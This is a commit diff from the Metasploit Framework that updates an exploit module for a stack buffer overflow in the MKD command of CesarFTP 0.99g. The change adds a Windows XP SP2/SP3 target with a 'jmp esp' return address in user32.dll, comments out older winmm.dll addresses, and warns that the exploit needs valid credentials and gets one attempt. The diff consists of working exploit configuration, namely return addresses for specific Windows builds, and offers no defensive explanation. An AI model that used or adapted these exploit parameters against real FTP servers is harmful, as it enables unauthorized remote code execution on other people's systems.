updated description, added xp sp2+sp3 target, see #687
git-svn-id: file:///home/svn/framework3/trunk@7853 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
0efbe3baf9
commit
ef0d86720a
|
@ -23,6 +23,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Name' => 'Cesar FTP 0.99g MKD Command Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the MKD verb in CesarFTP 0.99g.
|
||||
|
||||
You must have valid credentials to trigger this vulnerability. Also, you
|
||||
only get one chance, so choose your target carefully.
|
||||
},
|
||||
'Author' => 'MC',
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -50,7 +53,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e14c29 } ],
|
||||
[ 'Windows 2000 Pro SP4 French', { 'Ret' => 0x775F29D0 } ],
|
||||
[ 'Windows XP SP2 English', { 'Ret' => 0x76b43ae0 } ],
|
||||
[ 'Windows XP SP2/SP3 English', { 'Ret' => 0x774699bf } ], # jmp esp, user32.dll
|
||||
#[ 'Windows XP SP2 English', { 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll
|
||||
#[ 'Windows XP SP3 English', { 'Ret' => 0x76b43adc } ], # jmp esp, winmm.dll
|
||||
[ 'Windows 2003 SP1 English', { 'Ret' => 0x76AA679b } ],
|
||||
],
|
||||
'DisclosureDate' => 'Jun 12 2006',
|
||||
|
|
Loading…
Reference in New Issue